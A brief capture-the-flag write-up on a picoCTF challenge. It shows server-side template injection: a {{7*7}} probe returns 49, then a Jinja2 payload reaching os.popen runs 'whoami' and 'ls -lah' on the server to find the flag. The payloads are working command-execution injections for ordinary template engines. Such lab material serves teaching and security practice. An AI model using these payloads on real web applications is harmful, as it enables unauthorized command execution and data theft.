I made a cool website where you can announce whatever you want! Try it out!I heard templating is a cool and modular way to build web apps!
If we type picoCTF , it would show this :
let’s try some template injection, in this case we are going to use this {{7*7}}:
PayloadsAllTheThings/Server Side Template Injection at master
This time, we got 49 because 7 × 7 = 49. That means our injection works. Now, let’s try some more advanced injections.
Terminal
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('whoami').read() }}
Terminal
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls -lah').read() }}
now we can read the flag.